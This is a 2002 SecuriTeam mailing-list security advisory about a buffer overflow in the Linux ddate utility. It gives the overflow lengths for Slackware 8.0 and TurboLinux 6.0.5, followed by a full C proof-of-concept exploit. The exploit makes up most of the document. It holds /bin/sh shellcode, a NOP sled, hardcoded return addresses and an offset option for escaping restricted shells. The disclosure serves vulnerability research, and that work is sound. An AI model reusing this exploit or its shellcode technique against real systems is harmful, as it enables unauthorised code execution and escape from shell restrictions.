[UNIX] DDate Proof Of Concept Exploit and Bug details

From: support@securiteam.com
Date: 04/17/02


From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 17 Apr 2002 18:53:13 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  DDate Proof Of Concept Exploit and Bug details
------------------------------------------------------------------------

SUMMARY

DDate is a program installed by default on many Linux distributions. It
converts Gregorian dates to Discordian dates. A security vulnerability in
it allows attackers to execute arbitrary code by overflowing an internal
buffer in the program.

DETAILS

Vulnerable systems:
 * Slackware 8.0
 * TurboLinux 6.0.5

Risk:
Low (ddate is not setuid). A user only obtains a normal shell as
themselves; the practical effect is that a user confined to a restricted
shell can leave it and obtain an unrestricted shell.

The ddate program does not check the length of its format argument, which
allows the internal buffer to be overflowed with a command of the form:
        
     ddate +[STRING >420 Size]

On Slackware 8.0 an argument larger than 420 bytes overwrites the saved
EIP (the return address), so arbitrary code can be executed.

On TurboLinux 6.0.5 the buffer is 5 bytes smaller: 415 bytes will
overwrite the EIP.

Exploit:
/* /usr/bin/ddate Xploit, Proof of Concept

   OS: Linux - most distros; this exploit works best with Slackware 8.0 and
       TurboLinux 6.0.5, but you may try it on other distros if you
       get the RET address, or do an offset brute force.

   Author: Costantino Leandro le_costantino@ciudad.com.ar

   Risk: Low, ddate is not suid; a user can leave a restricted shell and
         obtain a 'new' sh shell.

   Date: 30/03/2001
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Buffer size 420 + 100 (100 more to have more chance to exploit it) */
#define buffer_size 520

/* On TurboLinux the buffer size is 515 */
#define turbo_size 515

/* These are the possible RET addresses I found to exploit it.
   Sometimes you will use RET1, sometimes RET2, etc. */
#define RET  0xbfffe5ed /* On Slackware 8.0 */
#define RET2 0xbfffd477
#define RET3 0xbffff9ac
#define RET4 0xbffff64d

/* For TurboLinux 6.0.5, possible RET addresses to exploit it */
#define RET5 0x7ffffb74
#define RET6 0x7ffffba1
#define RET7 0x7ffffb6a
#define RET8 0x7ffffb4c

#define doffset 0
#define NOP 0x90

char operador[] = "+";

/* Current stack pointer (i386 only) */
unsigned long get_sp(void)
{
   unsigned long sp;
   __asm__("movl %%esp,%0" : "=r"(sp));
   return sp;
}

char shellcode[] =
      "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
      "\x80\xe8\xdc\xff\xff\xff/bin/sh";

void help(void)
{
   printf("#####################################################\n");
   printf("DDATE Xploit (Slackware 8.0/TurboLinux 6.0.5)\n");
   printf("--------------------------------------------------\n");
   printf("Use: ./dxploit RET-Selection Offset (default 0)\n");
   printf("--------------------------------------------------\n");
   printf("RET-Selection:\n\n");
   printf("Slackware 8.0      Turbolinux 6.0.5\n\n");
   printf("1 0xbfffe5ed       5 0x7ffffb74\n");
   printf("2 0xbfffd477       6 0x7ffffba1\n");
   printf("3 0xbffff9ac       7 0x7ffffb6a\n");
   printf("4 0xbffff64d       8 0x7ffffb4c\n\n");
   printf("0 Get current address (for other distros), use with different offsets\n");
   printf("###########################################################\n\n");
   exit(1);
}

int main(int argc, char *argv[])
{
   int offset = doffset;
   int bsize = buffer_size;
   long *pointer_addr;
   long address;
   char *data_string, *point;
   char codex[buffer_size + 1];
   int elejido;            /* selected RET entry */
   int i;

   memset(codex, 0x00, sizeof(codex));

   if (argc > 1) {
      elejido = atoi(argv[1]);
   } else {
      help();
   }
   if (argc > 2) {
      offset = atoi(argv[2]);
   }

   switch (elejido) {
      case 0:
         address = get_sp() - offset;
         break;
      case 1:
         address = RET - offset;
         break;
      case 2:
         address = RET2 - offset;
         break;
      case 3:
         address = RET3 - offset;
         break;
      case 4:
         address = RET4 - offset;
         break;
      /* TurboLinux addresses */
      case 5:
         address = RET5 - offset;
         break;
      case 6:
         address = RET6 - offset;
         break;
      case 7:
         address = RET7 - offset;
         break;
      case 8:
         address = RET8 - offset;
         break;
      default:
         printf("Error: Not a valid RET selection, must be 1 to 8\n");
         help();
         exit(1);
   }

   /* Change the buffer size if a TurboLinux address was selected */
   if (elejido >= 5) {
      bsize = turbo_size;
   }
   /* a few bytes of slack so the word-sized fill below never runs past the end */
   if (!(data_string = malloc(bsize + sizeof(long)))) {
      printf("cannot allocate memory\n");
      exit(1);
   }

   printf("########################################\n");
   printf("DDATE Xploit (Slackware 8.0)\n");
   printf("Using address= %lx\n", address);
   printf("Offset = %d\n", offset);
   printf("Type ./dxploit for help\n");
   printf("########################################\n\n");

   point = data_string;
   pointer_addr = (long *)point;

   /* fill the whole buffer with the return address */
   for (i = 0; i < bsize; i += 4)
      *(pointer_addr++) = address;

   /* first half becomes the NOP sled */
   for (i = 0; i < bsize / 2; i++)
      data_string[i] = NOP;

   /* shellcode centred in the buffer */
   point = data_string + ((bsize / 2) - (strlen(shellcode) / 2));
   for (i = 0; i < strlen(shellcode); i++)
      *(point++) = shellcode[i];

   data_string[bsize - 1] = '\0';

   /* We need to execute the args +data_string, so I concatenate the '+' and
      the data_string in the codex variable */
   strcat(codex, operador);
   strcat(codex, data_string);

   /* Same as ddate +[string] */
   execl("/usr/bin/ddate", "ddate", codex, (char *)0);

   return 0;
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:le_costantino@ciudad.com.ar>
Costantino Leandro.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


